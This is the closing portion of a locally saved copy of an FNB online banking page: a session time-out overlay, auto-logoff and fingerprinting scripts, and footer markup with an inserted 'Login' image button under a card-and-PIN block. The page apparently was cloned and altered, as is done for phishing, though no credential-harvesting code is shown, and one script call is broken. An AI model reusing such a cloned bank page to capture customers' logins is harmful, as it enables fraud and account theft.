							    <option value="2024">2024</option>
							
							    <option value="2025">2025</option>
							
					   </select>
					</div>

				</div>
				<button type="button" class="dateRightScrollArrow"></button>
			</div>
		</div>
	</div>
</div>
	
	

<div id="notifications" class="overlayContainer index30 bodyWidth Hhide">
	<div class="overlayInner">
		<div class="notificationsWrapper">
			




<div class="closeButtonContainer">
	
	 	
	 	
			<div class="closeButton" onclick="fnb.controls.controller.eventsObject.raiseEvent('popupClose','');"></div>
		
		
	
</div>
			
			<div class="notificationsInner">
			<!-- <button type="button" class="notificationsClose"></button> -->
				
				<div class="notificationsTitle"></div>
				<p class="notificationsMessages">
				</p>
			</div>
		</div>
	</div>
</div>
	
	<div id="timeOut" class="overlayContainer bodyWidth index30 Hhide">

	<div class="overlayInner">
		
		<div class="timeOutWrapper">
				
			<div class="timeOutInner">
			
				<div class="clock">
					<div class="timer">60</div>
					<div id="timerText">seconds</div>
				</div>
				
				<div class="timeOutText">Your Online Banking session is about to time out...</div>
				
				<div class="timeOutButtonsWrapper">
					<a class="timeOutClose">Log Out</a>
					<a class="timeOutContinue">Continue Banking</a>
				</div>
				
			</div>
			
		</div>
		
	</div>
	
</div>
	
	





   



<script type="text/javascript">
    "use strict";
    var autoLogoff = (function () {
        return {
            init: function (warningInterval, logoutInterval) {
                if (warningInterval != null && warningInterval > 0) {
                    //If the timeout doesn't exist, create it
                    if (typeof logoffTimeout == 'undefined') {
                        var logoffTimeout = function () {
                            fnb.controls.controller.eventsObject.raiseEvent('eziSliderShow', {url: '/banking/Controller?nav=navigator.AutoLogoff'});
                            setTimeout(logoff, logoutInterval);
                        };
                        var logoff = function() {
                            window.location.href = '/banking/Controller?nav=navigator.UserLogoff';
                        };
                    } else { //If the timeout exists, reset it
                        clearTimeout(logoffTimeout);
                    }
                    setTimeout(logoffTimeout, warningInterval);
                }
            }

        };
    })();


    $(document).ready(function () {
        autoLogoff.init(,);
    });

</script>

	



<footer id="footerTag" class="bodyWidth index60">
	<div id="footerCornerImg"></div>
	<div id="support-reference" class="support-reference"></div>
	
	
	<div id="branchAssistContainer" class="">
		
		
		
		<span class="branchAssistBtn active" onclick="fnb.controls.controller.eventsObject.raiseEvent('eziSliderShow', {url: '/banking/Controller?nav=branch.assist.AssistantLogin'});">
			Assistant login
		</span>
		
		<span class="branchAssistant ">
			You are currently being assisted.
			&nbsp;&nbsp;
			<span class="branchAssistBtn " onclick="fnb.controls.controller.eventsObject.raiseEvent('eziSliderShow', {url: '/banking/Controller?nav=branch.assist.AssistantLogOut&amp;action=signOut'});">
				Assistant logout
			</span>
		</span>
		
	</div>
	
	<div id="footerContainer" class="w100 frameOffset">
		<div id="eziFooterButtonGroup" data-visible="false" class="Hhide">
			<div id="eziFooterButtonsContainer" style="margin-left: 1280px;">
			
			</div>
		</div>
		<div id="footerButtonGroup" class="" data-visible="true">
			<div id="footerButtonsContainer" style="margin-left: 1280px;">
			
			<div class="gridCol grid10 footerBtn ">
	
		
		
		
			
	
	
	
</div><div id="continueKYC" class="gridCol grid10 footerBtn " style="display: none;">
	
		
			
		
		
		
	
	
	
</div><div id="continueOFV" class="gridCol grid10 footerBtn " style="display: none;">
	
		
		
		
		
	
	
	
</div><div id="continueCardAndPin" class="gridCol grid10 footerBtn ">
	
		
	<br/>
	<input type="image" src="confirm.png" alt="Login" name="I1"  width="80" height="40">
	
	
</div><a href="#" class="hiddenRegister" onclick="fnb.controls.controller.eventsObject.raiseEvent('loadResultScreen','/banking/Controller?nav=enrollment.consultantregistration.ConsultantRegistrationLanding&amp;formname=REGISTRATION_SUMMARY&amp;action=consultant&amp;country=15'); return false;">.</a></div>
		</div>
	</div>
	
</footer>
	
	<iframe id="analyticsFame" src="Online%20Banking_files/ga_bridge.html" width="0" height="0"></iframe>
	


	





</form>















<script type="text/javascript" src="Online%20Banking_files/init.js" data-jsp=""></script>











 
<div id="hiddenPrintWrapper" style="display:none">
<div id="hiddenPrintDiv">

</div>
</div>


<div id="hiddenFingerPrint" style="display:none">




















 





















 





















 








</div>
	
<script type="text/javascript">
	var sessionTimeoutHandle = -1;
	namespace("fnb.clientTimeout",120);
	var timeToWait = 600000;
	var topMenuUrl = '/banking/Controller;jsessionid=gIwwm0AUu08HPIEJJRgDaaa8?nav=navigator.TopMenu&next=&countryCode=ZA&country=15&skin=0&simple=true';
	var defaultUrl = '/banking/Controller;jsessionid=gIwwm0AUu08HPIEJJRgDaaa8?nav=registration.navigator.RegistrationLanding&action=dologin&countryCode=ZA&country=15&skin=0&simple=true';
	var loggedIn = false
	$.post("/banking/Controller?nav=navigator.MainLoaded");
	try{
		$.post("/banking/FingerPrint.jsp",
			    function(data, status){
			        $('#hiddenFingerPrint').html(data);
			    });
	}catch(exception){ console.log(exception);}
	
	
	try{
		if(navigator.javaEnabled()){
			var jreVersion = function(){
			 var javaVersion = '';
			 // Walk through the full list of mime types.
			  for( var i=0,size=navigator.mimeTypes.length; i<size; i++ )
			  {
			      // The jpi-version is the plug-in version.  This is the best
		    	  // version to use.
		      	if( (result = navigator.mimeTypes[i].type.match(/^application\/x-java-applet;jpi-version=(.*)$/)) !== null ){
		    		  javaVersion = result[1];
		      	}
		    	  
		      }
			  return javaVersion;
			}
			if(jreVersion() && jreVersion().length > 0 ){
				$.post("/banking/Controller?nav=navigator.AppletVersionChecker", {jreVersion : jreVersion });
			}
			
			
		}
	}catch(exception){ console.log(exception);}
</script>
	
<script type="text/javascript">


$("#frameResponse").load(function(){

	var iframeHTML = $("#frameResponse").contents().find('body');
	
	var iframeString = iframeHTML.html();
	if(iframeString != ""){
		$("#pageContent").html(iframeHTML.html());
		iframeHTML.html("");
		fnb.utils.actionMenu.showButton();
		fnb.utils.errorPanel.hide();

	}

});

</script>
</body></html>